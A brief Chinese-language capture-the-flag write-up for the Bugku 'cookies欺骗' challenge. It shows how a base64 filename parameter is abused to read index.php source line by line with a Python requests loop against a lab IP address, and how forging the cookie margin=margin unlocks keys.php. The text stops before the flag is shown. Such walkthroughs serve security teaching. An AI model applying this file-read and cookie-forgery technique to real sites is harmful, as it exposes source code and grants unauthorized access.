Bugku cookies欺骗
1.点开链接显示字符串
2.filename=a2V5cy50eHQ= base64解码为keys.txt,将index.php通过base64编码,查看源码
url为:http://114.67.246.176:19276/index.php?line=1&filename=aW5kZXgucGhw
通过python脚本读取全部内容:
import requests
for i in range(30):
url = "http://114.67.246.176:19276/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
s = requests.get(url)
print (s.text)
得到内容,可知flag在keys.php中,且需满足$_COOKIE['margin']=='margin'
将urlfilename替换为keys.php的base64编码,且设置Cookies:Cookie: margin=margin;
得到答案: